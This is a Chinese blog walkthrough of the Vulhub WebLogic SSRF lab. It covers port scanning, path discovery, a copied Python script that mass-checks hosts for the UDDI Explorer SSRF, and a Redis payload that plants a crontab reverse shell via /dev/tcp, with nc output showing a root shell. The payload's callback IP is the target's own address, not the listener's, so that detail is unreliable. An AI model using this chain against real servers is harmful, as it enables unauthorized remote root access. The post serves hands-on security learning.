vulhub Weblogic SSRF漏洞 復現

環境和介紹請到Vulhub查看

假裝自己在閒逛,發現了一個網址http://10.20.7.7
好的先來一個全端口掃描，用我最近學會的新玩具netcat

root@Sanqiushu:~# nc -z -n -v 10.20.7.7 1-65535
(UNKNOWN) [10.20.7.7] 7001 (afs3-callback) open
(UNKNOWN) [10.20.7.7] 4444 (?) : Connection timed out
(UNKNOWN) [10.20.7.7] 22 (ssh) open
----------
獲取一下banner信息
root@Sanqiushu:~# echo "" | nc -n -v 10.20.7.7 1-65535
(UNKNOWN) [10.20.7.7] 7001 (afs3-callback) open
(UNKNOWN) [10.20.7.7] 4444 (?) : Connection timed out
(UNKNOWN) [10.20.7.7] 22 (ssh) open
SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3
Protocol mismatch.
------------
對比一下nmap
root@Sanqiushu:~# nmap  10.20.7.7 -p 1-65535
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-15 15:09 CST
Nmap scan report for 10.20.7.7
Host is up (0.000077s latency).
Not shown: 65532 closed ports
PORT     STATE    SERVICE
22/tcp   open     ssh
4444/tcp filtered krb524
7001/tcp open     afs3-callback
MAC Address: 08:00:27:F1:8C:A9 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 18.55 seconds

發現一個7001端口，瀏覽器訪問一下

沒啥發現，那就掃一下路徑

PS F:\SecTools\apps\dirsearch-master\dirsearch-master> ./dirsearch.py -u http://10.20.7.7:7001/ -e jsp

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: jsp | HTTP method: get | Threads: 10 | Wordlist size: 6074

Error Log: F:\SecTools\apps\dirsearch-master\dirsearch-master\logs\errors-19-08-15_15-00-35.log

Target: http://10.20.7.7:7001/

[15:00:35] Starting:
[15:00:41] 302 -  273B  - /bea_wls_internal  ->  http://10.20.7.7:7001/bea_wls_internal/
[15:00:41] 200 -    0B  - /bea_wls_internal/HTTPClntRecv
[15:00:41] 500 -    2KB - /beanManaged
[15:00:41] 500 -    2KB - /bea_wls_internal/HTTPClntSend
[15:00:41] 500 -    2KB - /bea_wls_internal/iiop/ClientClose
[15:00:41] 500 -    2KB - /bea_wls_internal/iiop/ClientLogin
[15:00:41] 200 -    0B  - /bea_wls_internal/iiop/ClientRecv
[15:00:41] 500 -    2KB - /Bigdump.jsp
[15:00:41] 500 -    2KB - /bea_wls_internal/iiop/ClientSend
[15:00:42] 200 -  416B  - /console
[15:00:42] 200 -  418B  - /console/
[15:00:42] 200 -  435B  - /console/base/config.json
[15:00:42] 200 -  440B  - /console/payments/config.json
[15:00:42] 200 -  437B  - /console/j_security_check
[15:00:54] 302 -  265B  - /uddiexplorer  ->  http://10.20.7.7:7001/uddiexplorer/
[15:00:54] 302 -  249B  - /uddi  ->  http://10.20.7.7:7001/uddi/
[15:00:55] 200 -  855B  - /uddi/uddilistener

Task Completed
PS F:\SecTools\apps\dirsearch-master\dirsearch-master>

發現不少路徑訪問一下看看

發現一個UDDI Explorer
這個漏洞影響的版本是weblogic 10.0.2 -- 10.3.6
這裏看不到版本很難受
直接測試吧

隨便搜索點啥

burp攔截請求，右鍵發送到Repeater

這裏改成測試地址

服務器返回404，很好
然後探測內網服務
腳本見https://www.jianshu.com/p/97b157a20108（我沒試過）
複製過來一下

import re

import sys

import Queue

import requests

import threading

from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

queue = Queue.Queue()

mutex = threading.Lock()

class Test(threading.Thread):
    def __init__(self, queue):

        threading.Thread.__init__(self)

        self.queue = queue

    def check(self,domain,ip):

        payload = "uddiexplorer/SearchPublicRegistries.jsp?operator={ip}&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search".format(ip=ip)

        url = domain + payload

        try:

            html = requests.get(url=url, timeout=15, verify=False).content

            m = re.search('weblogic.uddi.client.structures.exception.XML_SoapException',html)

            if m:

                mutex.acquire()

                with open('ssrf1.txt','a+') as f:

                    print "%s has weblogic ssrf." % domain

                    f.write("%s has weblogic ssrf." % domain)

                mutex.release()

        except Exception,e:

            print e

    def get_registry(self,domain):

        payload = 'uddiexplorer/SetupUDDIExplorer.jsp'

        url = domain + payload

        try:

            html = requests.get(url=url, timeout=15, verify=False).content

            m = re.search('<i>For example: (.*?)/uddi/uddilistener.*?</i>',html)

            if m:

                return m.group(1)

        except Exception,e:

            print e

    def run(self):

        while not self.queue.empty():

            domain = self.queue.get()

            mutex.acquire()

            print domain

            mutex.release()

            ip = self.get_registry(domain)

            self.check(domain,ip)

            self.queue.task_done()

if __name__ == '__main__':

    with open('domain.txt','r') as f:

        lines = f.readlines()

    for line in lines:

        queue.put(line.strip())

    for x in xrange(1,50):

        t = Test(queue)

        t.setDaemon(True)

        t.start()

    queue.join()

這裏發現一個6379的服務（咋知道這是啥服務呢？）

直接redis的payload打過去就好了

監聽的機器等好一會就收到連接了

root@Sanqiushu:~# nc -lvp 4444
listening on [any] 4444 ...
10.20.7.7: inverse host lookup failed: Unknown host
connect to [10.20.2.185] from (UNKNOWN) [10.20.7.7] 45976
bash: no job control in this shell
[root@31607ec8723e ~]# ls
ls
anaconda-ks.cfg
install.log
install.log.syslog
[root@31607ec8723e ~]# ls
ls
anaconda-ks.cfg
install.log
install.log.syslog
[root@31607ec8723e ~]# 

payload 原本長這樣

test

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/10.20.7.7/4444 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

aaa

發送的時候進行url編碼了，post的話好像沒啥必要